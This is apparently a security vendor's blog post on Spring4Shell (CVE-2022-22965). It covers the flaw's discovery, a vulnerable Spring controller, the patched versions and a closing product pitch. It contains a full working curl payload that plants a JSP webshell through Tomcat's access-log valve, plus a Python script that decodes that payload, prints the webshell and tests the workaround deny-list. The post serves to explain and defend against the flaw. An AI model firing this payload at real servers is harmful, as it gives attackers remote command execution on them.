TL;DR: CVE-2022-22965 is a Critical zero-day RCE vulnerability in Spring Core caused by the way Spring's data binding maps request parameters onto Java objects, which lets an attacker reach nested properties such as the class loader. We have created an open-source exploit PoC with a vulnerable application and exploit payload you can try right now: spring4shell-exploit-poc.
How was Spring4shell or CVE-2022-22965 discovered?
On March 29th 2022, a Chinese security researcher on Twitter released screenshots showing RCE in a Spring Core application, which has since been assigned CVE-2022-22965. The researcher also released a Python exploit and a vulnerability report written in Chinese. The tweets have since been deleted and the researcher has deleted their accounts.
The CVE assignment took some time because the vulnerability posted by the researcher had to be analysed and confirmed. It was assigned on March 31st, 2022, rated Critical with a CVSS score of 9.8.
How does Spring4shell work?
Our HelloController below contains a @PostMapping to /greeting. When we POST to this route via the Tomcat server, http://app/helloworld/greeting, Spring transforms the HTTP request data into a POJO (Plain Old Java Object), in this case a Greeting object. Under the hood, Spring uses data binding (WebDataBinder) to convert the request parameters into Java objects, mapping each parameter name to a bean property and following nested paths such as a.b.c through getters. As it turns out, you can set many more fields than the ones on Greeting, including the properties of its Class object. Spring had blocked the path class.classLoader after CVE-2010-1622, but on JDK 9+ Class exposes getModule(), so the path class.module.classLoader walks around that block and reaches the web application's class loader, from which Tomcat's internal objects are reachable.
```java
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.ModelAttribute;
import org.springframework.web.bind.annotation.PostMapping;

@Controller
public class HelloController {

    // GET /greeting renders the form with an empty Greeting backing object.
    @GetMapping("/greeting")
    public String greetingForm(Model model) {
        model.addAttribute("greeting", new Greeting());
        return "hello";
    }

    // POST /greeting: @ModelAttribute makes Spring bind every request
    // parameter onto a Greeting via WebDataBinder, following nested
    // property paths such as class.module.classLoader.* (the bug).
    @PostMapping("/greeting")
    public String greetingSubmit(@ModelAttribute Greeting greeting, Model model) {
        return "hello";
    }
}
```
Using curl we combine a few headers and POST data and are able to write a JSP webshell to webapps/ROOT on the container, which gives us Remote Code Execution via http://app/shell.jsp?cmd=<cmd>. The property path class.module.classLoader.resources.context.parent.pipeline.first resolves to the first valve in the Tomcat host's pipeline, the AccessLogValve, so the parameters reconfigure its log pattern, directory, file prefix and suffix to write shell.jsp under webapps/ROOT. The three custom headers (prefix, suffix, c) are pulled into the log line through Tomcat's %{name}i access-log directive, so the JSP delimiters and the Runtime class name never appear literally in the pattern value.
```shell
curl \
  -H "prefix:<%" \
  -H "suffix:%>//" \
  -H "c:Runtime" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" \
  http://localhost:8080/helloworld/greeting
```
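To make the request above concrete, here is an added example (not code from the original post or from the PoC repository) that decodes the same form body and headers, shows which parameter names a WebDataBinder deny-list in the shape Spring recommended as a workaround (class.*, Class.*, *.class.*, *.Class.*) would reject, and emulates the one AccessLogValve directive the payload relies on, %{name}i, to show the JSP that ends up on disk. The sample body and headers are constructed here by copying the curl command; the glob matching is a plain illustration, not Spring's own implementation.

```python
"""Decode the Spring4Shell request and show what it binds and what it writes.

Added example; SAMPLE_BODY and SAMPLE_HEADERS are constructed from the curl
command in the post. The deny-list glob matcher is a simplified stand-in for
Spring's disallowed-field check, not its actual code.
"""
import re
from urllib.parse import parse_qsl

# Constructed sample: the headers and body the curl command sends.
SAMPLE_HEADERS = {"prefix": "<%", "suffix": "%>//", "c": "Runtime"}
VALVE = "class.module.classLoader.resources.context.parent.pipeline.first."
SAMPLE_BODY = (
    VALVE + "pattern="
    "%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime()"
    ".exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B"
    "%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)"
    "%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di"
    "&" + VALVE + "suffix=.jsp"
    "&" + VALVE + "directory=webapps/ROOT"
    "&" + VALVE + "prefix=shell"
    "&" + VALVE + "fileDateFormat="
)

# Deny-list patterns in the shape Spring suggested for
# WebDataBinder.setDisallowedFields: any path with a class/Class segment
# that keeps nesting is refused.
DISALLOWED = ("class.*", "Class.*", "*.class.*", "*.Class.*")


def _glob_to_regex(pattern: str) -> re.Pattern:
    """Turn a '*' glob into an anchored regex (simplified matcher)."""
    return re.compile("^" + re.escape(pattern).replace(r"\*", ".*") + "$")


def form_params(body: str) -> dict:
    """Percent-decode an application/x-www-form-urlencoded body."""
    return dict(parse_qsl(body, keep_blank_values=True))


def disallowed_fields(body: str) -> list:
    """Return the parameter names in `body` that the deny-list would reject."""
    regs = [_glob_to_regex(p) for p in DISALLOWED]
    return sorted(name for name in form_params(body) if any(r.match(name) for r in regs))


def render_access_log_pattern(pattern: str, headers: dict) -> str:
    """Emulate only the %{name}i directive of Tomcat's AccessLogValve:
    it is replaced by request header `name` (missing header -> '-').
    Other directives are left untouched."""
    return re.sub(r"%\{([^}]+)\}i", lambda m: headers.get(m.group(1), "-"), pattern)


def webshell_source(body: str, headers: dict) -> str:
    """The text one access-log line would contain after header substitution."""
    return render_access_log_pattern(form_params(body)[VALVE + "pattern"], headers)


def log_file_path(body: str) -> str:
    """Where the valve writes: directory/prefix + dateStamp + suffix.
    An empty fileDateFormat yields an empty dateStamp; '/' assumed as separator."""
    p = form_params(body)
    return f"{p[VALVE + 'directory']}/{p[VALVE + 'prefix']}{p[VALVE + 'fileDateFormat']}{p[VALVE + 'suffix']}"


if __name__ == "__main__":
    print("rejected by deny-list:", *disallowed_fields(SAMPLE_BODY), sep="\n  ")
    print("file written:", log_file_path(SAMPLE_BODY))
    print("contents:", webshell_source(SAMPLE_BODY, SAMPLE_HEADERS))
```

Running it lists all five class.module.classLoader.* parameter names as rejected, resolves the target file to webapps/ROOT/shell.jsp and prints the `<% ... %>//` JSP that the valve would append to it; a normal form body such as greeting.message=hi passes the deny-list untouched.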
Impact of Spring4Shell
The impact of the vulnerability is wide: it is trivial to exploit and a large number of Java applications use Spring, which explains the high CVSS score. The prerequisites to exploit it are common:
- JDK 9 or later
- an application built on Spring Framework (Spring MVC or Spring WebFlux) or a derived framework such as Spring Boot
- deployed as a WAR on Apache Tomcat
Spring's advisory notes that the default Spring Boot executable JAR with embedded Tomcat is not affected by this particular exploit chain, but the underlying data binding flaw is more general and other chains may exist, so the fix is to upgrade to Spring Framework 5.3.18 / 5.2.20 (Spring Boot 2.6.6 / 2.5.12) rather than to rely on the packaging.
Depending on frameworks and libraries is essential; however, vulnerabilities such as Spring4Shell and Log4Shell pose immense risk to the organization. You want to ensure that your security controls are working across the attack surface. FourCore ATTACK can help you ensure this by routinely assessing your security controls with real-world attack simulations.